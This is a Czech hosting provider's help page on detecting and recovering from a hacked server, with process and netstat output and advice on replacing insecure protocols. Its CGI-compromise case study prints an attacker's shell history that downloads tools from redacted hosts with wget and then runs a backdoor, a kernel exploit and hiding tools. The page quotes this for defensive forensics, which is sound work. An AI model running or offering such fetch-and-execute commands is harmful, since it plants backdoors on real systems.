Vyhledávání


vytiskni pdf
Hack serveru

Toto se může stát i vám.

Jak zjistit, že byl server hacknut?

Podíváním se na MRTG nemůžete nic zkazit:





A na serveru nalezneme:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400


Očividně byl hacrek schopen spouštět aplikace v root. Server je hacknut a musí být přeinstalován.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823


Jsou zde spuštěny aplikace, které mají PID a nejsou vidět ps. Jistě díky faktu, že ps byl nahrazen a hacknut ps který filtruje všechny aplikace hackera aby se ztratil.

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!

We immediately stop the machine.

Můžeme mít problém s Semi hacked serveru.

Jiné zkušenosti: Příklad hacknutého serveru.

Proč je server hacknut?

Je hned několik možností, jak může k hacku dojít. Takové malé shrnutí můžete vidět níže:
nejste paranoidní.

Používáte telnet. Vaše přihlašovací jméno a heslo cestuje přes Internet a může být kdykoli ukradeno a zneužito. Musíte používat SSH. Zde je o SSH příručka: SSH na dedikovaném serveru.

Používáte FTP. Vaše uživatelské jméno a heslo cestuje přes Internet a jde o root heslo. Řešením je SFTP-

Používáte POP3/IMAP s heslem a jde o root heslo. Použijte APOP, nebo POP3S/IMAPS. Zde je o tom příručka:SMTP POP3 IMAP.

Jestliže neaktualizujete server novými verzemi Release Patch, riskujete snadný hack (na naší síti je prováděno denně zhruba 250 skenování, za účelem odhalení bezpečnostních rizik).

Co dělat?

Jestliže je váš server hacknut, bude automaticky přebootován do Rescue módu do kterého máte přístup pouze pomocí FTP (pouze pro čtení). Vaše přístupové kódy vám budou zaslány e-mailem.

Poté budete kontaktováni naší podporou a budete muset provést nezbytné kroky k odstranění problému, ke kterému došlo. Jakmile ujistíte podporu o tom, že víte kde se nachází chyba a že se problém již nebude opakovat, opětovně vám zaktivujeme server.

Cena je 2250 Kč + DPH a zrestartujete server s přednastavenou distribucí na novém disku. Jestliže to server umožňuje, dáme předchozí(napadený) disk jako sekundární a připojíme ho na 10 dní.

Případ hacku

1. selhání CGI skriptu

Symptomy

Soubor g00dies.tgz nahraje do adresáře /tmp k ostatním souborům: x, k, etc...
Program x jsou ve skutečnosti zadní vrátka. Jestliže je spuštěn, dává přístup na server.

Nalezneme bash.history uživatele nobody v /tmp.

cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


Poznámky

Díky tomu můžeme zjistit, že příkaz byl umístěn jako nobody, ale tento uživatel je především využíván Apachem. Vypadá to, že hacker těží ze zranitelnosti CGI skriptu.

Řešení

- Ukončit (Kill) všechny podezřelé běžící procesy.
Hacker očividně není v root (ačkoli může těžit ze základního jádra <2.4.24);
Uděláme některé základní operace/změny:

  • Změňte všechny hesla: root, user, mysql, mail, atd. (vidíme, že hacker spustil mingetty)
  • Vyhledejte soubory, které byly změněny od doby hacku: find /rep -cmin -60 (zkontroluje všechny soubory, které byly za poslední hodinu změněny).

- Projděte logy z Apache z doby kolem provedení hacku a nalezněte podezřelé skripty.